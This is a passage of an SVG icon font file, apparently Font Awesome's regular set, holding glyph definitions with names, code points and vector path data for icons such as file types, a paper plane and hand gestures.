d="M369.9 350.1c9 -9 14.0996 -21.2998 14.0996 -34v-332.1c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48.0996h204.1c12.7002 0 24.9004 -5.09961 33.9004 -14.0996zM332.1 320l-76.0996 76.0996v-76.0996h76.0996zM48 -16h288v288
h-104c-13.2998 0 -24 10.7002 -24 24v104h-160v-416zM80 32v64l39.5 39.5c4.7002 4.7002 12.2998 4.7002 17 0l39.5 -39.5l87.5 87.5c4.7002 4.7002 12.2998 4.7002 17 0l23.5 -23.5v-128h-224zM128 272c26.5 0 48 -21.5 48 -48s-21.5 -48 -48 -48s-48 21.5 -48 48
s21.5 48 48 48z" />
    <glyph glyph-name="file-archive" unicode="&#xf1c6;" horiz-adv-x="384" 
d="M128.3 288h32v-32h-32v32zM192.3 384v-32h-32v32h32zM128.3 352h32v-32h-32v32zM192.3 320v-32h-32v32h32zM369.9 350.1c9 -9 14.0996 -21.2998 14.0996 -34v-332.1c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48.0996h204.1
c12.7002 0 24.9004 -5.09961 33.9004 -14.0996zM256 396.1v-76.0996h76.0996zM336 -16v288h-104c-13.2998 0 -24 10.7002 -24 24v104h-48.2998v-16h-32v16h-79.7002v-416h288zM194.2 182.3l17.2998 -87.7002c6.40039 -32.3994 -18.4004 -62.5996 -51.5 -62.5996
c-33.2002 0 -58 30.4004 -51.4004 62.9004l19.7002 97.0996v32h32v-32h22.1006c5.7998 0 10.6992 -4.09961 11.7998 -9.7002zM160.3 57.9004c17.9004 0 32.4004 12.0996 32.4004 27c0 14.8994 -14.5 27 -32.4004 27c-17.8994 0 -32.3994 -12.1006 -32.3994 -27
c0 -14.9004 14.5 -27 32.3994 -27zM192.3 256v-32h-32v32h32z" />
    <glyph glyph-name="file-audio" unicode="&#xf1c7;" horiz-adv-x="384" 
d="M369.941 350.059c7.75977 -7.75977 14.0586 -22.9658 14.0586 -33.9404v-332.118c0 -26.5098 -21.4902 -48 -48 -48h-288c-26.5098 0 -48 21.4902 -48 48v416c0 26.5098 21.4902 48 48 48h204.118c10.9746 0 26.1807 -6.29883 33.9404 -14.0586zM332.118 320
l-76.1182 76.1182v-76.1182h76.1182zM48 -16h288v288h-104c-13.2549 0 -24 10.7451 -24 24v104h-160v-416zM192 60.0244c0 -10.6914 -12.9258 -16.0459 -20.4854 -8.48535l-35.5146 35.9746h-28c-6.62695 0 -12 5.37305 -12 12v56c0 6.62695 5.37305 12 12 12h28
l35.5146 36.9473c7.56055 7.56055 20.4854 2.20605 20.4854 -8.48535v-135.951zM233.201 107.154c9.05078 9.29688 9.05957 24.1328 0.000976562 33.4385c-22.1494 22.752 12.2344 56.2461 34.3945 33.4814c27.1982 -27.9404 27.2119 -72.4443 0.000976562 -100.401
c-21.793 -22.3857 -56.9463 10.3154 -34.3965 33.4814z" />
    <glyph glyph-name="file-video" unicode="&#xf1c8;" horiz-adv-x="384" 
d="M369.941 350.059c7.75977 -7.75977 14.0586 -22.9658 14.0586 -33.9404v-332.118c0 -26.5098 -21.4902 -48 -48 -48h-288c-26.5098 0 -48 21.4902 -48 48v416c0 26.5098 21.4902 48 48 48h204.118c10.9746 0 26.1807 -6.29883 33.9404 -14.0586zM332.118 320
l-76.1182 76.1182v-76.1182h76.1182zM48 -16h288v288h-104c-13.2549 0 -24 10.7451 -24 24v104h-160v-416zM276.687 195.303c10.0049 10.0049 27.3135 2.99707 27.3135 -11.3135v-111.976c0 -14.2939 -17.2959 -21.332 -27.3135 -11.3135l-52.6865 52.6738v-37.374
c0 -11.0459 -8.9541 -20 -20 -20h-104c-11.0459 0 -20 8.9541 -20 20v104c0 11.0459 8.9541 20 20 20h104c11.0459 0 20 -8.9541 20 -20v-37.374z" />
    <glyph glyph-name="file-code" unicode="&#xf1c9;" horiz-adv-x="384" 
d="M149.9 98.9004c3.5 -3.30078 3.69922 -8.90039 0.399414 -12.4004l-17.3994 -18.5996c-1.60059 -1.80078 -4 -2.80078 -6.40039 -2.80078c-2.2002 0 -4.40039 0.900391 -6 2.40039l-57.7002 54.0996c-3.7002 3.40039 -3.7002 9.30078 0 12.8008l57.7002 54.0996
c3.40039 3.2998 9 3.2002 12.4004 -0.400391l17.3994 -18.5996l0.200195 -0.200195c3.2002 -3.59961 2.7998 -9.2002 -0.799805 -12.3994l-32.7998 -28.9004l32.7998 -28.9004zM369.9 350.1c9 -9 14.0996 -21.2998 14.0996 -34v-332.1c0 -26.5 -21.5 -48 -48 -48h-288
c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48.0996h204.1c12.7002 0 24.9004 -5.09961 33.9004 -14.0996zM256 396.1v-76.0996h76.0996zM336 -16v288h-104c-13.2998 0 -24 10.7002 -24 24v104h-160v-416h288zM209.6 234l24.4004 -7
c4.7002 -1.2998 7.40039 -6.2002 6 -10.9004l-54.7002 -188.199c-1.2998 -4.60059 -6.2002 -7.40039 -10.8994 -6l-24.4004 7.09961c-4.7002 1.2998 -7.40039 6.2002 -6 10.9004l54.7002 188.1c1.39941 4.7002 6.2002 7.40039 10.8994 6zM234.1 157.1
c-3.5 3.30078 -3.69922 8.90039 -0.399414 12.4004l17.3994 18.5996c3.30078 3.60059 8.90039 3.7002 12.4004 0.400391l57.7002 -54.0996c3.7002 -3.40039 3.7002 -9.30078 0 -12.8008l-57.7002 -54.0996c-3.5 -3.2998 -9.09961 -3.09961 -12.4004 0.400391
l-17.3994 18.5996l-0.200195 0.200195c-3.2002 3.59961 -2.7998 9.2002 0.799805 12.3994l32.7998 28.9004l-32.7998 28.9004z" />
    <glyph glyph-name="life-ring" unicode="&#xf1cd;" 
d="M256 -56c-136.967 0 -248 111.033 -248 248s111.033 248 248 248s248 -111.033 248 -248s-111.033 -248 -248 -248zM152.602 20.7197c63.2178 -38.3184 143.579 -38.3184 206.797 0l-53.4111 53.4111c-31.8467 -13.5215 -68.168 -13.5059 -99.9746 0zM336 192
c0 44.1123 -35.8877 80 -80 80s-80 -35.8877 -80 -80s35.8877 -80 80 -80s80 35.8877 80 80zM427.28 88.6016c38.3184 63.2178 38.3184 143.579 0 206.797l-53.4111 -53.4111c13.5215 -31.8467 13.5049 -68.168 0 -99.9746zM359.397 363.28
c-63.2168 38.3184 -143.578 38.3184 -206.796 0l53.4111 -53.4111c31.8457 13.5215 68.167 13.5049 99.9736 0zM84.7197 295.398c-38.3184 -63.2178 -38.3184 -143.579 0 -206.797l53.4111 53.4111c-13.5215 31.8467 -13.5059 68.168 0 99.9746z" />
    <glyph glyph-name="paper-plane" unicode="&#xf1d8;" 
d="M440 441.5c34.5996 19.9004 77.5996 -8.7998 71.5 -48.9004l-59.4004 -387.199c-2.2998 -14.5 -11.0996 -27.3008 -23.8994 -34.5c-7.2998 -4.10059 -15.4004 -6.2002 -23.6006 -6.2002c-6.19922 0 -12.3994 1.2002 -18.2998 3.59961l-111.899 46.2002l-43.8008 -59.0996
c-27.3994 -36.9004 -86.5996 -17.8008 -86.5996 28.5996v84.4004l-114.3 47.2998c-36.7998 15.0996 -40.1006 66 -5.7002 85.8994zM192 -16l36.5996 49.5l-36.5996 15.0996v-64.5996zM404.6 12.7002l59.4004 387.3l-416 -240l107.8 -44.5996l211.5 184.3
c14.2002 12.2998 34.4004 -5.7002 23.7002 -21.2002l-140.2 -202.3z" />
    <glyph glyph-name="futbol" unicode="&#xf1e3;" horiz-adv-x="496" 
d="M483.8 268.6c42.2998 -130.199 -29 -270.1 -159.2 -312.399c-25.5 -8.2998 -51.2998 -12.2002 -76.6992 -12.2002c-104.5 0 -201.7 66.5996 -235.7 171.4c-42.2998 130.199 29 270.1 159.2 312.399c25.5 8.2998 51.2998 12.2002 76.6992 12.2002
c104.5 0 201.7 -66.5996 235.7 -171.4zM409.3 74.9004c6.10059 8.39941 12.1006 16.8994 16.7998 26.1992c14.3008 28.1006 21.5 58.5 21.7002 89.2002l-38.8994 36.4004l-71.1006 -22.1006l-24.3994 -75.1992l43.6992 -60.9004zM409.3 310.3
c-24.5 33.4004 -58.7002 58.4004 -97.8994 71.4004l-47.4004 -26.2002v-73.7998l64.2002 -46.5l70.7002 22zM184.9 381.6c-39.9004 -13.2998 -73.5 -38.5 -97.8008 -71.8994l10.1006 -52.5l70.5996 -22l64.2002 46.5v73.7998zM139 68.5l43.5 61.7002l-24.2998 74.2998
l-71.1006 22.2002l-39 -36.4004c0.5 -55.7002 23.4004 -95.2002 37.8008 -115.3zM187.2 1.5c64.0996 -20.4004 115.5 -1.7998 121.7 0l22.3994 48.0996l-44.2998 61.7002h-78.5996l-43.6006 -61.7002z" />
    <glyph glyph-name="newspaper" unicode="&#xf1ea;" horiz-adv-x="576" 
d="M552 384c13.2549 0 24 -10.7451 24 -24v-336c0 -13.2549 -10.7451 -24 -24 -24h-496c-30.9277 0 -56 25.0723 -56 56v272c0 13.2549 10.7451 24 24 24h42.752c6.60547 18.623 24.3896 32 45.248 32h440zM48 56c0 -4.41113 3.58887 -8 8 -8s8 3.58887 8 8v248h-16v-248z
M528 48v288h-416v-280c0 -2.7168 -0.204102 -5.38574 -0.578125 -8h416.578zM172 168c-6.62695 0 -12 5.37305 -12 12v96c0 6.62695 5.37305 12 12 12h136c6.62695 0 12 -5.37305 12 -12v-96c0 -6.62695 -5.37305 -12 -12 -12h-136zM200 248v-40h80v40h-80zM160 108v24
c0 6.62695 5.37305 12 12 12h136c6.62695 0 12 -5.37305 12 -12v-24c0 -6.62695 -5.37305 -12 -12 -12h-136c-6.62695 0 -12 5.37305 -12 12zM352 108v24c0 6.62695 5.37305 12 12 12h104c6.62695 0 12 -5.37305 12 -12v-24c0 -6.62695 -5.37305 -12 -12 -12h-104
c-6.62695 0 -12 5.37305 -12 12zM352 252v24c0 6.62695 5.37305 12 12 12h104c6.62695 0 12 -5.37305 12 -12v-24c0 -6.62695 -5.37305 -12 -12 -12h-104c-6.62695 0 -12 5.37305 -12 12zM352 180v24c0 6.62695 5.37305 12 12 12h104c6.62695 0 12 -5.37305 12 -12v-24
c0 -6.62695 -5.37305 -12 -12 -12h-104c-6.62695 0 -12 5.37305 -12 12z" />
    <glyph glyph-name="bell-slash" unicode="&#xf1f6;" horiz-adv-x="640" 
d="M633.99 -23.0195c6.91016 -5.52051 8.01953 -15.5908 2.5 -22.4902l-10 -12.4902c-5.53027 -6.88965 -15.5898 -8.00977 -22.4902 -2.49023l-598 467.51c-6.90039 5.52051 -8.01953 15.5908 -2.49023 22.4902l10 12.4902
c5.52051 6.90039 15.5898 8.00977 22.4902 2.49023zM163.53 80h182.84l61.3994 -48h-279.659c-19.1201 0 -31.9902 15.5996 -32.1006 32c-0.0498047 7.5498 2.61035 15.2598 8.61035 21.71c18.3701 19.7402 51.5703 49.6904 54.8398 140.42l45.4697 -35.5498
c-6.91992 -54.7803 -24.6895 -88.5498 -41.3994 -110.58zM320 352c-23.3496 0 -45 -7.17969 -62.9404 -19.4004l-38.1699 29.8408c19.6807 15.7793 43.1104 27.3096 69.1299 32.7197v20.8398c0 17.6699 14.3203 32 31.9805 32s31.9805 -14.3301 31.9805 -32v-20.8398
c73.46 -15.2598 127.939 -77.46 127.939 -155.16c0 -41.3604 6.03027 -70.7197 14.3398 -92.8496l-59.5293 46.54c-1.63086 13.96 -2.77051 28.8896 -2.79004 45.7295c0 0.200195 0.0595703 0.379883 0.0595703 0.580078c0 61.8604 -50.1396 112 -112 112zM320 -64
c-35.3203 0 -63.9697 28.6504 -63.9697 64h127.939c0 -35.3496 -28.6494 -64 -63.9697 -64z" />
    <glyph glyph-name="copyright" unicode="&#xf1f9;" 
d="M256 440c136.967 0 248 -111.033 248 -248s-111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248zM256 -8c110.549 0 200 89.4678 200 200c0 110.549 -89.4678 200 -200 200c-110.549 0 -200 -89.4688 -200 -200c0 -110.549 89.4678 -200 200 -200z
M363.351 93.0645c-9.61328 -9.71289 -45.5293 -41.3965 -104.064 -41.3965c-82.4297 0 -140.484 61.4248 -140.484 141.567c0 79.1514 60.2754 139.4 139.763 139.4c55.5303 0 88.7373 -26.6201 97.5928 -34.7783c2.13379 -1.96289 3.86523 -5.9082 3.86523 -8.80762
c0 -1.95508 -0.864258 -4.87402 -1.92969 -6.51465l-18.1543 -28.1133c-3.8418 -5.9502 -11.9668 -7.28223 -17.499 -2.9209c-8.5957 6.77637 -31.8145 22.5381 -61.708 22.5381c-48.3037 0 -77.916 -35.3301 -77.916 -80.082c0 -41.5889 26.8877 -83.6924 78.2764 -83.6924
c32.6572 0 56.8428 19.0391 65.7266 27.2256c5.26953 4.85645 13.5957 4.03906 17.8193 -1.73828l19.8652 -27.1699c1.28613 -1.74512 2.33008 -4.91992 2.33008 -7.08789c0 -2.72363 -1.56055 -6.5 -3.48242 -8.42969z" />
    <glyph glyph-name="closed-captioning" unicode="&#xf20a;" 
d="M464 384c26.5 0 48 -21.5 48 -48v-288c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v288c0 26.5 21.5 48 48 48h416zM458 48c3.2998 0 6 2.7002 6 6v276c0 3.2998 -2.7002 6 -6 6h-404c-3.2998 0 -6 -2.7002 -6 -6v-276c0 -3.2998 2.7002 -6 6 -6h404z
M246.9 133.7c1.69922 -2.40039 1.5 -5.60059 -0.5 -7.7002c-53.6006 -56.7998 -172.801 -32.0996 -172.801 67.9004c0 97.2998 121.7 119.5 172.5 70.0996c2.10059 -2 2.5 -3.2002 1 -5.7002l-17.5 -30.5c-1.89941 -3.09961 -6.19922 -4 -9.09961 -1.7002
c-40.7998 32 -94.5996 14.9004 -94.5996 -31.1992c0 -48 51 -70.5 92.1992 -32.6006c2.80078 2.5 7.10059 2.10059 9.2002 -0.899414zM437.3 133.7c1.7002 -2.40039 1.5 -5.60059 -0.5 -7.7002c-53.5996 -56.9004 -172.8 -32.0996 -172.8 67.9004
c0 97.2998 121.7 119.5 172.5 70.0996c2.09961 -2 2.5 -3.2002 1 -5.7002l-17.5 -30.5c-1.90039 -3.09961 -6.2002 -4 -9.09961 -1.7002c-40.8008 32 -94.6006 14.9004 -94.6006 -31.1992c0 -48 51 -70.5 92.2002 -32.6006c2.7998 2.5 7.09961 2.10059 9.2002 -0.899414z
" />
    <glyph glyph-name="object-group" unicode="&#xf247;" 
d="M500 320h-12v-256h12c6.62695 0 12 -5.37305 12 -12v-72c0 -6.62695 -5.37305 -12 -12 -12h-72c-6.62695 0 -12 5.37305 -12 12v12h-320v-12c0 -6.62695 -5.37305 -12 -12 -12h-72c-6.62695 0 -12 5.37305 -12 12v72c0 6.62695 5.37305 12 12 12h12v256h-12
c-6.62695 0 -12 5.37305 -12 12v72c0 6.62695 5.37305 12 12 12h72c6.62695 0 12 -5.37305 12 -12v-12h320v12c0 6.62695 5.37305 12 12 12h72c6.62695 0 12 -5.37305 12 -12v-72c0 -6.62695 -5.37305 -12 -12 -12zM448 384v-32h32v32h-32zM32 384v-32h32v32h-32zM64 0v32
h-32v-32h32zM480 0v32h-32v-32h32zM440 64v256h-12c-6.62695 0 -12 5.37305 -12 12v12h-320v-12c0 -6.62695 -5.37305 -12 -12 -12h-12v-256h12c6.62695 0 12 -5.37305 12 -12v-12h320v12c0 6.62695 5.37305 12 12 12h12zM404 256c6.62695 0 12 -5.37207 12 -12v-168
c0 -6.62793 -5.37305 -12 -12 -12h-200c-6.62695 0 -12 5.37207 -12 12v52h-84c-6.62695 0 -12 5.37207 -12 12v168c0 6.62793 5.37305 12 12 12h200c6.62695 0 12 -5.37207 12 -12v-52h84zM136 280v-112h144v112h-144zM376 104v112h-56v-76
c0 -6.62793 -5.37305 -12 -12 -12h-76v-24h144z" />
    <glyph glyph-name="object-ungroup" unicode="&#xf248;" horiz-adv-x="576" 
d="M564 224h-12v-160h12c6.62695 0 12 -5.37305 12 -12v-72c0 -6.62695 -5.37305 -12 -12 -12h-72c-6.62695 0 -12 5.37305 -12 12v12h-224v-12c0 -6.62695 -5.37305 -12 -12 -12h-72c-6.62695 0 -12 5.37305 -12 12v72c0 6.62695 5.37305 12 12 12h12v24h-88v-12
c0 -6.62695 -5.37305 -12 -12 -12h-72c-6.62695 0 -12 5.37305 -12 12v72c0 6.62695 5.37305 12 12 12h12v160h-12c-6.62695 0 -12 5.37305 -12 12v72c0 6.62695 5.37305 12 12 12h72c6.62695 0 12 -5.37305 12 -12v-12h224v12c0 6.62695 5.37305 12 12 12h72
c6.62695 0 12 -5.37305 12 -12v-72c0 -6.62695 -5.37305 -12 -12 -12h-12v-24h88v12c0 6.62695 5.37305 12 12 12h72c6.62695 0 12 -5.37305 12 -12v-72c0 -6.62695 -5.37305 -12 -12 -12zM352 384v-32h32v32h-32zM352 128v-32h32v32h-32zM64 96v32h-32v-32h32zM64 352v32
h-32v-32h32zM96 136h224v12c0 6.62695 5.37305 12 12 12h12v160h-12c-6.62695 0 -12 5.37305 -12 12v12h-224v-12c0 -6.62695 -5.37305 -12 -12 -12h-12v-160h12c6.62695 0 12 -5.37305 12 -12v-12zM224 0v32h-32v-32h32zM504 64v160h-12c-6.62695 0 -12 5.37305 -12 12v12
h-88v-88h12c6.62695 0 12 -5.37305 12 -12v-72c0 -6.62695 -5.37305 -12 -12 -12h-72c-6.62695 0 -12 5.37305 -12 12v12h-88v-24h12c6.62695 0 12 -5.37305 12 -12v-12h224v12c0 6.62695 5.37305 12 12 12h12zM544 0v32h-32v-32h32zM544 256v32h-32v-32h32z" />
    <glyph glyph-name="sticky-note" unicode="&#xf249;" horiz-adv-x="448" 
d="M448 99.8936c0 -10.9746 -6.29883 -26.1797 -14.0586 -33.9404l-83.8828 -83.8818c-7.75977 -7.76074 -22.9658 -14.0596 -33.9404 -14.0596h-268.118c-26.5098 0 -48 21.4902 -48 48v351.988c0 26.5098 21.4902 48 48 48h352c26.5098 0 48 -21.4902 48 -48v-268.106z
M320 19.8936l76.1182 76.1182h-76.1182v-76.1182zM400 368h-352v-351.988h224v104c0 13.2549 10.7451 24 24 24h104v223.988z" />
    <glyph glyph-name="clone" unicode="&#xf24d;" 
d="M464 448c26.5098 0 48 -21.4902 48 -48v-320c0 -26.5098 -21.4902 -48 -48 -48h-48v-48c0 -26.5098 -21.4902 -48 -48 -48h-320c-26.5098 0 -48 21.4902 -48 48v320c0 26.5098 21.4902 48 48 48h48v48c0 26.5098 21.4902 48 48 48h320zM362 -16c3.31152 0 6 2.68848 6 6
v42h-224c-26.5098 0 -48 21.4902 -48 48v224h-42c-3.31152 0 -6 -2.68848 -6 -6v-308c0 -3.31152 2.68848 -6 6 -6h308zM458 80c3.31152 0 6 2.68848 6 6v308c0 3.31152 -2.68848 6 -6 6h-308c-3.31152 0 -6 -2.68848 -6 -6v-308c0 -3.31152 2.68848 -6 6 -6h308z" />
    <glyph glyph-name="hourglass" unicode="&#xf254;" horiz-adv-x="384" 
d="M368 400c0 -80.0996 -31.8984 -165.619 -97.1797 -208c64.9912 -42.1934 97.1797 -127.436 97.1797 -208h4c6.62695 0 12 -5.37305 12 -12v-24c0 -6.62695 -5.37305 -12 -12 -12h-360c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h4
c0 80.0996 31.8994 165.619 97.1797 208c-64.9912 42.1934 -97.1797 127.436 -97.1797 208h-4c-6.62695 0 -12 5.37305 -12 12v24c0 6.62695 5.37305 12 12 12h360c6.62695 0 12 -5.37305 12 -12v-24c0 -6.62695 -5.37305 -12 -12 -12h-4zM64 400
c0 -101.621 57.3066 -184 128 -184s128 82.3799 128 184h-256zM320 -16c0 101.62 -57.3076 184 -128 184s-128 -82.3799 -128 -184h256z" />
    <glyph glyph-name="hand-rock" unicode="&#xf255;" 
d="M408.864 368.948c48.8213 20.751 103.136 -15.0723 103.136 -67.9111v-114.443c0 -15.3955 -3.08887 -30.3906 -9.18262 -44.5674l-42.835 -99.6562c-4.99707 -11.625 -3.98242 -18.8574 -3.98242 -42.3701c0 -17.6729 -14.3271 -32 -32 -32h-252
c-17.6729 0 -32 14.3271 -32 32c0 27.3301 1.1416 29.2012 -3.11035 32.9033l-97.71 85.0811c-24.8994 21.6797 -39.1797 52.8926 -39.1797 85.6338v56.9531c0 47.4277 44.8457 82.0215 91.0459 71.1807c1.96094 55.751 63.5107 87.8262 110.671 60.8057
c29.1895 31.0713 78.8604 31.4473 108.334 -0.0214844c32.7051 18.6846 76.4121 10.3096 98.8135 -23.5879zM464 186.594v114.445c0 34.29 -52 33.8232 -52 0.676758c0 -8.83594 -7.16309 -16 -16 -16h-7c-8.83691 0 -16 7.16406 -16 16v26.751
c0 34.457 -52 33.707 -52 0.676758v-27.4287c0 -8.83594 -7.16309 -16 -16 -16h-7c-8.83691 0 -16 7.16406 -16 16v40.4658c0 34.3525 -52 33.8115 -52 0.677734v-41.1436c0 -8.83594 -7.16406 -16 -16 -16h-7c-8.83594 0 -16 7.16406 -16 16v26.751
c0 34.4023 -52 33.7744 -52 0.676758v-116.571c0 -8.83203 -7.16797 -16 -16 -16c-3.30664 0 -8.01367 1.7627 -10.5068 3.93359l-7 6.09473c-3.03223 2.64062 -5.49316 8.04688 -5.49316 12.0674v0v41.2275c0 34.2148 -52 33.8857 -52 0.677734v-56.9531
c0 -18.8555 8.27441 -36.874 22.7002 -49.4365l97.71 -85.0801c12.4502 -10.8398 19.5898 -26.4463 19.5898 -42.8164v-10.2861h220v7.07617c0 13.21 2.65332 26.0791 7.88281 38.25l42.835 99.6553c2.91602 6.75391 5.28223 18.207 5.28223 25.5635v0.0488281z" />
    <glyph glyph-name="hand-paper" unicode="&#xf256;" horiz-adv-x="448" 
d="M372.57 335.359c39.9062 5.63281 75.4297 -25.7393 75.4297 -66.3594v-131.564c-0.00195312 -12.7666 -2.33008 -33.2246 -5.19531 -45.666l-30.1836 -130.958c-3.34668 -14.5234 -16.2783 -24.8125 -31.1816 -24.8125h-222.897
c-9.10352 0 -20.7793 6.01758 -26.0615 13.4316l-119.97 168.415c-21.2441 29.8203 -14.8047 71.3574 14.5498 93.1533c18.7754 13.9395 42.1309 16.2979 62.083 8.87109v126.13c0 44.0547 41.125 75.5439 82.4053 64.9834c23.8926 48.1963 92.3535 50.2471 117.982 0.74707
c42.5186 11.1445 83.0391 -21.9346 83.0391 -65.5469v-10.8242zM399.997 137.437l-0.00195312 131.563c0 24.9492 -36.5703 25.5508 -36.5703 -0.691406v-76.3086c0 -8.83691 -7.16309 -16 -16 -16h-6.85645c-8.83691 0 -16 7.16309 -16 16v154.184
c0 25.501 -36.5703 26.3633 -36.5703 0.691406v-154.875c0 -8.83691 -7.16309 -16 -16 -16h-6.85645c-8.83691 0 -16 7.16309 -16 16v188.309c0 25.501 -36.5703 26.3545 -36.5703 0.691406v-189c0 -8.83691 -7.16309 -16 -16 -16h-6.85645c-8.83691 0 -16 7.16309 -16 16
v153.309c0 25.501 -36.5713 26.3359 -36.5713 0.691406v-206.494c0 -15.5703 -20.0352 -21.9092 -29.0303 -9.2832l-27.1279 38.0791c-14.3711 20.1709 -43.833 -2.33496 -29.3945 -22.6045l115.196 -161.697h201.92l27.3252 118.551
c2.63086 11.417 3.96484 23.1553 3.96484 34.8857z" />
    <glyph glyph-name="hand-scissors" unicode="&#xf257;" 
d="M256 -32c-44.9561 0 -77.3428 43.2627 -64.0244 85.8535c-21.6484 13.71 -34.0156 38.7617 -30.3408 65.0068h-87.6348c-40.8037 0 -74 32.8105 -74 73.1406c0 40.3291 33.1963 73.1396 74 73.1396l94 -9.14062l-78.8496 18.6787
c-38.3076 14.7422 -57.04 57.4707 -41.9424 95.1123c15.0303 37.4736 57.7549 55.7803 95.6416 41.2012l144.929 -55.7568c24.9551 30.5566 57.8086 43.9932 92.2178 24.7324l97.999 -54.8525c20.9746 -11.7393 34.0049 -33.8457 34.0049 -57.6904v-205.702
c0 -30.7422 -21.4404 -57.5576 -51.7979 -64.5537l-118.999 -27.4268c-4.97168 -1.14648 -10.0889 -1.72949 -15.2031 -1.72949zM256 16.0127l70 -0.000976562c1.23633 0 3.21777 0.225586 4.42285 0.501953l119.001 27.4277
c8.58203 1.97754 14.5762 9.29102 14.5762 17.7812v205.701c0 6.4873 -3.62109 12.542 -9.44922 15.8047l-98 54.8545c-8.13965 4.55566 -18.668 2.61914 -24.4873 -4.50781l-21.7646 -26.6475c-2.65039 -3.24512 -8.20215 -5.87891 -12.3926 -5.87891
c-1.64062 0 -4.21484 0.477539 -5.74609 1.06738l-166.549 64.0908c-32.6543 12.5664 -50.7744 -34.5771 -19.2227 -46.7168l155.357 -59.7852c5.66016 -2.17773 10.2539 -8.86816 10.2539 -14.9326v0v-11.6328c0 -8.83691 -7.16309 -16 -16 -16h-182
c-34.375 0 -34.4297 -50.2803 0 -50.2803h182c8.83691 0 16 -7.16309 16 -16v-6.85645c0 -8.83691 -7.16309 -16 -16 -16h-28c-25.1221 0 -25.1592 -36.5674 0 -36.5674h28c8.83691 0 16 -7.16211 16 -16v-6.85547c0 -8.83691 -7.16309 -16 -16 -16
c-25.1201 0 -25.1602 -36.5674 0 -36.5674z" />
    <glyph glyph-name="hand-lizard" unicode="&#xf258;" horiz-adv-x="576" 
d="M556.686 157.458c12.6357 -19.4863 19.3145 -42.0615 19.3145 -65.2871v-124.171h-224v71.582l-99.751 38.7871c-2.7832 1.08203 -5.70996 1.63086 -8.69727 1.63086h-131.552c-30.8789 0 -56 25.1211 -56 56c0 48.5234 39.4766 88 88 88h113.709l18.333 48h-196.042
c-44.1123 0 -80 35.8877 -80 80v8c0 30.8779 25.1211 56 56 56h293.917c24.5 0 47.084 -12.2725 60.4111 -32.8291zM528 16v76.1709v0.0478516c0 11.7461 -5.19141 29.2734 -11.5879 39.124l-146.358 225.715c-4.44336 6.85254 -11.9707 10.9424 -20.1367 10.9424h-293.917
c-4.41113 0 -8 -3.58887 -8 -8v-8c0 -17.6445 14.3555 -32 32 -32h213.471c25.2021 0 42.626 -25.293 33.6299 -48.8457l-24.5518 -64.2812c-7.05371 -18.4658 -25.0732 -30.873 -44.8398 -30.873h-113.709c-22.0557 0 -40 -17.9443 -40 -40c0 -4.41113 3.58887 -8 8 -8
h131.552h0.0517578c7.44141 0 19.1074 -2.19238 26.041 -4.89355l99.752 -38.7881c18.5898 -7.22852 30.6035 -24.7881 30.6035 -44.7363v-23.582h128z" />
    <glyph glyph-name="hand-spock" unicode="&#xf259;" 
d="M21.0957 66.21c-26.9688 25.3818 -28.2471 67.7461 -2.87109 94.707c24.1982 25.7139 64.2881 28.2373 91.4824 5.72168l-31.04 136.509c-9.38379 41.2803 21.4336 81.0127 64.0713 81.8438c1.74414 28.9062 22.2656 54.4912 51.8818 61.2949
c36.001 8.27539 72.0176 -14.2266 80.3037 -50.2959l21.6748 -131.99l16.9014 105.25c9.02344 36.0947 45.4473 57.7021 81.25 48.75c27.3066 -6.82715 45.7061 -29.1357 49.8496 -53.9922c43.2285 0.212891 75.6436 -40.1133 65.5439 -82.5244l-31.7295 -133.41
c-0.938477 -3.94141 -1.41406 -7.99414 -1.41406 -12.0449v-36.8389v-0.00683594c0 -9.29102 -2.14355 -24.0596 -4.78516 -32.9668l-31.8145 -107.312c-4.02734 -13.585 -16.5107 -22.9043 -30.6807 -22.9043h-237.6c-7.00586 0 -16.8311 3.89648 -21.9316 8.69824z
M53.1641 128.021c-7.17969 -7.62891 -6.81543 -19.6777 0.813477 -26.8574l124.487 -117.164h219.311l28.4199 95.8613c1.86133 6.27637 2.80469 12.7793 2.80469 19.3281v36.8389c0.000976562 6.48047 1.21973 16.8574 2.71973 23.1621l31.7549 133.407
c5.83105 24.4893 -31.1445 33.25 -36.9658 8.80273l-26.9229 -113.105c-1.61523 -6.78711 -8.58887 -12.2949 -15.5645 -12.2949h-9.69434c-10.4072 0 -18.043 9.79199 -15.5225 19.8799l38.127 152.512c6.09766 24.376 -30.7607 33.6396 -36.8643 9.21777l-42.3721 -169.49
c-1.67285 -6.68945 -8.62695 -12.1191 -15.5225 -12.1191h-13.2168v0c-7.0332 0 -14.0195 5.5625 -15.5938 12.417l-45.2207 196.828c-5.64453 24.5684 -42.6572 15.9609 -37.0342 -8.50781l41.6191 -181.153c2.30078 -10.0156 -5.31738 -19.583 -15.5938 -19.583h-8.60352
h-0.000976562c-7.0498 0 -14.04 5.5791 -15.6025 12.4541l-30.3984 133.757c-5.55273 24.4395 -42.6504 16.1963 -37.0547 -8.4209l34.1299 -150.172c0.263672 -1.16309 0.397461 -2.35352 0.397461 -3.5459v-69.4795c0 -13.9941 -16.7754 -21.2432 -26.9658 -11.6523
l-53.0117 49.8936c-7.61523 7.16699 -19.6377 6.85938 -26.8564 -0.8125z" />
    <glyph glyph-name="hand-pointer" unicode="&#xf25a;" horiz-adv-x="448" 
d="M358.182 268.639c43.1934 16.6348 89.8184 -15.7949 89.8184 -62.6387v-84c-0.000976562 -4.25 -0.775391 -11.0615 -1.72754 -15.2041l-27.4297 -118.999c-6.98242 -30.2969 -33.7549 -51.7969 -64.5566 -51.7969h-178.286c-21.2588 0 -41.3682 10.4102 -53.791 27.8457
l-109.699 154.001c-21.2432 29.8193 -14.8047 71.3574 14.5498 93.1523c18.8115 13.9658 42.1748 16.2822 62.083 8.87207v161.129c0 36.9443 29.7363 67 66.2861 67s66.2861 -30.0557 66.2861 -67v-73.6338c20.4131 2.85742 41.4678 -3.94238 56.5947 -19.6289
